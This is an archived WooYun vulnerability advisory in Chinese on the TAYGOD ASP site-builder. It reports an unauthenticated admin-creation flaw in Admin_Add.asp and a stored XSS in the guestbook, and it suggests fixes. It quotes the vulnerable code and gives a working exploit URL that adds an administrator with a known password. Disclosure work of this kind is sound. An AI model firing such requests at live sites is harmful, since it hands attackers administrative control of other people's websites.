当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-09821

漏洞标题:TAYGOD免费企业建站系统无验证添加管理员漏洞实战及留言本XSS漏洞

相关厂商:TAYGOD

漏洞作者: 无敌金创药

提交时间:2012-07-18 11:51

修复时间:2012-09-01 11:51

公开时间:2012-09-01 11:51

漏洞类型:非授权访问/权限绕过

危害等级:高

自评Rank:18

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-07-18: 积极联系厂商并且等待厂商认领中,细节不对外公开
2012-09-01: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

①无验证添加管理员
②留言本XSS漏洞

详细说明:

①无验证添加管理员
漏洞文件:Admin_Add.asp
漏洞代码:
<!--#include file="../../config/conn.asp"-->
<!--#include file="md5.asp"-->
<%
if request.QueryString("action")="save" then
uid=replace(trim(Request("uid")),"'","")
realname=replace(trim(Request("realname")),"'","")
pwd1=replace(trim(Request("pwd1")),"'","")
pwd2=replace(trim(Request("pwd2")),"'","")
password=md5(pwd1)
原因:未进行验证直接写入数据
利用方案:构造URL
http://localhost/source/admin/Admin_Add.asp?action=save&uid=test&realname=test&pwd1=123456&pwd2=123456
这样就能添加进去一个帐号为test,密码为123456的管理员用户
②留言本XSS漏洞
漏洞文件:Message.asp
漏洞代码:
if request.QueryString("action")="save" then
username=trim(request("username"))
email=trim(request("email"))
tel=trim(request("tel"))
zhiwu=trim(request("zhiwu"))
city=trim(request("city"))
qq=trim(request("qq"))
add=trim(request("add"))
title=trim(request("title"))
content=trim(request("content"))
messageip=Request.ServerVariables("REMOTE_ADDR")
set rs=server.CreateObject("adodb.recordset")
rs.open "select * from TAY_message",conn,1,3
原因:未过滤,后台照样能够执行

漏洞证明:


介个站点是官方演示站点,同样存在漏洞

修复方案:

修补方案:加入判断代码
if session("admin")="" then
response.Write "<script language='javascript'>alert('网络超时或您还没有登陆!');window.location.href='login.asp';</script>"
response.End
end if
留言本添加过滤

版权声明:转载请注明来源 无敌金创药@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝